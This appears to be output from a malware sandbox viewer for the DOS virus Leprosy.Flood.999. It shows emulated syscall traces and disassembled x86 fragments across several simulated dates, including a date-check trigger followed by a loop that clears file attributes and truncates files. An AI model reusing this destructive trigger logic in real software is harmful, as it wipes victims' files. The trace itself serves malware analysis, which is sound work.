Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Flood.999


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:46.704553764Z 48 PC: 12b36 | Get DOS version
2018-12-17T22:42:46.706740233Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-17T22:42:46.709794387Z 26 PC: 12b49 | Set disk transfer address
2018-12-17T22:42:46.710911285Z 25 PC: 12b4d | Get default drive
2018-12-17T22:42:46.712454552Z 71 PC: 12b58 | Get current directory
2018-12-17T22:42:46.715663646Z 59 PC: 12b5f | Change current directory
2018-12-17T22:42:46.719838914Z 78 PC: 12b69 | Find first file
2018-12-17T22:42:46.741298549Z 87 PC: 12c4d | Get or set file date and time
2018-12-17T22:42:46.74383408Z 67 PC: 12c59 | Get or set file attributes
2018-12-17T22:42:46.749582481Z 59 PC: 12c60 | Change current directory
2018-12-17T22:42:46.758608244Z 59 PC: 12c67 | Change current directory
2018-12-17T22:42:46.760774725Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-17T22:42:46.763101747Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7658,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:19.483495189Z 48 PC: 12b36 | Get DOS version
2018-12-25T12:02:19.48509079Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T12:02:19.488101909Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T12:02:19.489322805Z 25 PC: 12b4d | Get default drive
2018-12-25T12:02:19.490698172Z 71 PC: 12b58 | Get current directory
2018-12-25T12:02:19.494464008Z 59 PC: 12b5f | Change current directory
2018-12-25T12:02:19.499030952Z 78 PC: 12b69 | Find first file
2018-12-25T12:02:19.505636645Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T12:02:19.507875328Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T12:02:19.514165823Z 59 PC: 12c60 | Change current directory
2018-12-25T12:02:19.524497105Z 59 PC: 12c67 | Change current directory
2018-12-25T12:02:19.527411233Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T12:02:19.52964145Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7658,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:19.509896796Z 48 PC: 12b36 | Get DOS version
2018-12-25T12:02:19.512101984Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T12:02:19.514008295Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T12:02:19.515083127Z 25 PC: 12b4d | Get default drive
2018-12-25T12:02:19.516994867Z 71 PC: 12b58 | Get current directory
2018-12-25T12:02:19.520162973Z 59 PC: 12b5f | Change current directory
2018-12-25T12:02:19.524814212Z 78 PC: 12b69 | Find first file
2018-12-25T12:02:19.531692925Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T12:02:19.534129713Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T12:02:19.540345851Z 59 PC: 12c60 | Change current directory
2018-12-25T12:02:19.551543767Z 59 PC: 12c67 | Change current directory
2018-12-25T12:02:19.553682951Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T12:02:19.555920119Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7658,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:19.517946943Z 48 PC: 12b36 | Get DOS version
2018-12-25T12:02:19.519228492Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T12:02:19.521499392Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T12:02:19.522759066Z 25 PC: 12b4d | Get default drive
2018-12-25T12:02:19.525302778Z 71 PC: 12b58 | Get current directory
2018-12-25T12:02:19.529242893Z 59 PC: 12b5f | Change current directory
2018-12-25T12:02:19.533612424Z 78 PC: 12b69 | Find first file
2018-12-25T12:02:19.539868071Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T12:02:19.542219677Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T12:02:19.548464924Z 59 PC: 12c60 | Change current directory
2018-12-25T12:02:19.558170771Z 59 PC: 12c67 | Change current directory
2018-12-25T12:02:19.560814428Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T12:02:19.563115387Z 26 PC: 12c81 | Set disk transfer address
2018-12-25T12:02:19.564150356Z 78 PC: 12c8b | Find first file
2018-12-25T12:02:19.576829552Z 67 PC: 12c94 | Get or set file attributes
2018-12-25T12:02:19.582867525Z 60 PC: 12c9b | Create or truncate file
2018-12-25T12:02:19.606865513Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.610337845Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.621405631Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.633077828Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.636101376Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.649900831Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.662506481Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.664507513Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.672391779Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.685549466Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.688310581Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.699126158Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.715169503Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.718454922Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.729342445Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.742542345Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.745356486Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.756182014Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.769960957Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.772805122Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.783786961Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.797059286Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.799778276Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.811256677Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.82486233Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.827631531Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7658,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:19.701652377Z 48 PC: 12b36 | Get DOS version
2018-12-25T12:02:19.703720915Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T12:02:19.705783005Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T12:02:19.706807143Z 25 PC: 12b4d | Get default drive
2018-12-25T12:02:19.709076203Z 71 PC: 12b58 | Get current directory
2018-12-25T12:02:19.711730124Z 59 PC: 12b5f | Change current directory
2018-12-25T12:02:19.715875886Z 78 PC: 12b69 | Find first file
2018-12-25T12:02:19.722013524Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T12:02:19.723725099Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T12:02:19.729233734Z 59 PC: 12c60 | Change current directory
2018-12-25T12:02:19.737968221Z 59 PC: 12c67 | Change current directory
2018-12-25T12:02:19.740583422Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T12:02:19.742860791Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')